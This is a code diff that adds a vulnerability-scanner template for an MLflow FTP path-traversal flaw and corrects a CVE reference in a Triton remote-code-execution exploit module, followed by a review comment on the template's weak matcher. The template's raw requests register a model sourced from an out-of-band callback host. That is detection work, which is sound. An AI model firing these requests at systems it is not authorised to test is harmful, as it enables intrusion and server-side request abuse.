diff --git a/mlflow/mlflow-url-parsing-confusion-lfi.yaml b/mlflow/mlflow-url-parsing-confusion-lfi.yaml
new file mode 100644
index 0000000..91c4cf7
--- /dev/null
+++ b/mlflow/mlflow-url-parsing-confusion-lfi.yaml
@@ -0,0 +1,41 @@
+id: mlflow-url-parsing-confusion-lfi
+info:
+ name: MLflow FTP Path Traversal
+ author: kevin-mizu, byt3bl33d3r
+ severity: high
+ description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server.
+ reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
+ cvss-score: 9.3
+ cve-id: CVE-2023-6975
+ cwe-id: CWE-29
+ tags: mlflow,ml,cve,path-traversal
+
+variables:
+ experiment_name: "{{rand_text_alpha(6)}}"
+
+http:
+ - raw:
+ - |
+ POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"name": "{{experiment_name}}"}
+ - |
+ POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"}
+ - |
+ GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
diff --git a/triton/triton_model_rce.py b/triton/triton_model_rce.py
index 4154c58..ff5270d 100755
--- a/triton/triton_model_rce.py
+++ b/triton/triton_model_rce.py
@@ -38,7 +38,7 @@ metadata = {
 'license': 'MSF_LICENSE',
 'references': [
 {'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'},
- {'type': 'cve', 'ref': 'CVE-2023-6025'}
+ {'type': 'cve', 'ref': 'CVE-2023-31036'}
 ],
 'type': 'remote_exploit_cmd_stager',
 'targets': [
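Review bot: The only matcher in the new template (`part: interactsh_protocol`, `words: - "dns"`) proves just that the target resolved the attacker-supplied `ftp://{{interactsh-url}}/a` host from the `source` field, which is an outbound-fetch/SSRF signal rather than the path-traversal-to-arbitrary-file-write the `description`, `cwe-id: CWE-29` and `name: MLflow FTP Path Traversal` claim, and `path=random` in the third request is not a traversal payload at all. A DNS hit could plausibly fire from the model-version registration alone, so a scanner user reading "high / 9.3 / arbitrary write" gets more confidence than the check earns; I would at minimum add a second matcher on the final request (for example `type: status` with `status: - 200` under the existing `matchers-condition: and`) and reword the description to say the template detects that MLflow fetches attacker-controlled FTP sources, which is the precondition the reference describes. Two smaller points: the `id` says `lfi` while the name says path traversal/write, and the variable is named `experiment_name` but is used as a registered-model name. The template also leaves the created registered model and version on the target with no cleanup request, which is worth a comment such as `# NOTE: creates a registered model named {{experiment_name}} on the target; not removed` so operators know the scan has a persistent side effect.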